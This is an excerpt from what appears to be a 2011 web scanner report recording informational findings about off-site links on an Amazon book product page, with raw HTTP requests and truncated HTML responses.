...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.377. http://www.amazon.com/gp/product/1935182374

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/1935182374

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:57:41 GMT
Server: Server
x-amz-id-1: 027K1D9QR6E9AFT1A078
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: OwxFpFf0hMIMGCKro+1twDX6vYIw54wEe8OMhd2f+vuqXSu73tXT+Lh8+P6LR4ix
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-7103494-9643855; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Z35lEbXZmkNfw6hGfUjZ1K/4sw9WxxWFwMV/sJojBHuQgfFG+laL6NBK88paqKSztzsyJyDY/9AAZYrH81BfgD8rTRvxvEg+urhq3RkrxgkxmmIIkrtyYCUV+2HgzOsTjXded6kudqqsvL+RF9iqh9s1neAJEhZBJuQUJ6fV0vKWxj1UV3P224fkpsI34l5gnXdRjQwvL69Ix88BfWLYI1n0WolrEPJNgIAYMPxxB/4wzXf/fS2hwoXMhWseZz0UfRaIwEdIw8o0SertvxEIxH98QQoDQBKeCwqeNTJsxrj/Bt5gtr5CqobKWBENaQBEtNCUoEJcD/ax5YGH2AVRSkMtliytO5We6vXhJWjcvqI/oN7HTuAspZxJdqvTNivZFw8Tkca7cqqHW5RaIwD9nbIS0tdyjDTRrfW9etHNUOHiSMqa9Msf4bwp5+Uydtaan0m/Rcv1EfQ=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:57:41 2011 GMT
Content-Length: 399873


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<em>FBA items qualify for FREE Super Saver Shipping and <img src="http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif" width="92" alt="Amazon Prime" height="12" border="0" />.</em>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/1935182374/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 in Action" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=027K1D9QR6E9AFT1A078&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=" rel="nofollow">60+ <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.componentone.com/freetrial</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">microsoft.com/Web/WebMatrix</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.accusoft.com/<b>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=bxgy_cc_b_img_a"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 in Action" id="" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Programming-WCF-Services-Mastering-AppFabric/dp/0596805489/ref=bxgy_cc_b_img_b"><img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Programming WCF Services: Mastering WCF and the Azure AppFabric Service Bus" id="" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0672333368" ><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Foundation-Expression-Blend-4-Silverlight/dp/143022973X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_143022973X" ><img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg" width="50" alt="Foundation Expression Blend 4 with Silverlight" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/186-7103494-9643855"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.378. http://www.amazon.com/gp/product/1935182374

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/1935182374

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:13 GMT
Server: Server
x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
Content-Length: 398788


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


